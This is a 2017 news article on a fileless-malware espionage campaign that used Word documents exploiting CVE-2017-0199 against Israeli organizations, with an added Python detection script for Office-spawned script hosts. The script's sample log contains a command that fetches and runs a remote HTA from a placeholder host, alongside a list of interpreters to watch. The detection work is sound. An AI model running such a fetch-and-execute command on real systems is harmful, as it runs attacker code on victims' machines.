New cyber espionage campaign targets Israeli organizations
April 28, 2017
A new cyber espionage campaign is targeting Israeli organizations and relies on fileless malware, a tactic that is becoming a growing menace in cyberspace.
The malicious emails were sent from several compromised email accounts at Ben Gurion University to multiple targets across Israel.
Malware from a 'fileless' attack is so called because it resides solely in memory, with commands delivered directly from the web.
This means there are no executable files on disk and no artefacts for conventional computer forensic analysis to pick up, which makes the attacks stealthy, if not downright invisible.
Even so, malware infections still generate plenty of potentially suspicious network traffic, across multiple paths, on any given day.
Investigators at Israeli cybersecurity firm Morphisec say the attacks originated in Iran and were the work of the same hackers responsible for the recent OilRig malware campaign.
The attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word, tracked as CVE-2017-0199, by reusing an existing proof-of-concept that was published immediately after the patch was released.
Microsoft released the security patch for the vulnerability in question on April 11, but many organizations have not yet deployed the update. The delivered documents installed a fileless variant of the Helminth Trojan agent.
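Because a fileless payload leaves nothing on disk, defenders have to key on behaviour instead: the Office process that opened the document spawning a script host (the published CVE-2017-0199 exploitation chain hands a remote HTA to mshta.exe), or the Office process itself talking to the network. The following is an added example, not code from the article or from Morphisec; it parses constructed, simplified Sysmon-style events (the pipe-separated format and the sample values are assumptions) and flags those two behaviours.

```python
"""Flag behaviours that Office-borne fileless attacks still expose in
process and network telemetry. Added illustration; the event format is a
simplified, constructed stand-in for real Sysmon events."""
from typing import Dict, List

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}

# Constructed sample events (not real telemetry). Format:
#   EventType|key=value|key=value...
# 203.0.113.0/24 is a documentation address range, used here as a placeholder.
SAMPLE_LOG = r"""
ProcessCreate|ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta http://203.0.113.10/x.hta
NetworkConnect|Image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|DestinationIp=203.0.113.10|DestinationPort=80
ProcessCreate|ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|CommandLine=winword report.docx
NetworkConnect|Image=C:\Windows\System32\svchost.exe|DestinationIp=10.0.0.5|DestinationPort=443
"""


def parse_event(line: str) -> Dict[str, str]:
    """Split one pipe-separated event into a dict; first field is the type."""
    event_type, *fields = line.strip().split("|")
    event = {"EventType": event_type}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def flag_suspicious(log_text: str) -> List[str]:
    """Return one alert string per event matching a fileless-attack pattern."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev["EventType"] == "ProcessCreate":
            parent = image_name(ev.get("ParentImage", ""))
            child = image_name(ev.get("Image", ""))
            # Rule 1: an Office application launching a script/host interpreter.
            if parent in OFFICE and child in SCRIPT_HOSTS:
                alerts.append(f"office-spawned-script-host: {parent} -> {child} "
                              f"[{ev.get('CommandLine', '')}]")
        elif ev["EventType"] == "NetworkConnect":
            # Rule 2: the Office process itself opening a network connection.
            if image_name(ev.get("Image", "")) in OFFICE:
                alerts.append(f"office-network-connection: {image_name(ev['Image'])} "
                              f"-> {ev.get('DestinationIp')}:{ev.get('DestinationPort')}")
    return alerts
```

Both rules fire on in-memory stages that write nothing to disk, which is the point the article makes about where such attacks remain visible.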
The trend is rapidly getting worse, and fileless attacks are on the rise. Security vendor Carbon Black recently reported a 33.2 percent rise in severe non-malware attacks in Q4 2016 compared to Q1. In-memory attacks doubled relative to the infection rates of file-based vectors, according to a study by another endpoint security vendor, SentinelOne.
The general use of the fileless malware tactic, first spotted more than five years ago but only becoming really fashionable since mid-2016, extends beyond state-sponsored cyber-espionage.
For example, Kaspersky Lab warned earlier this month about fileless attacks against banking networks. The attack was geared towards robbing money from ATMs.
Kaspersky Lab asserted: "Fileless malware is being increasingly used in various attacks by both targeted threat actors and cybercriminals in general, helping to avoid detection and make forensic investigations more difficult. We have found examples in the lateral movement tools used in the Shamoon attacks, in attacks against Eastern European banks, and in the hands of a number of other APT actors."
Source: Kaspersky Labs.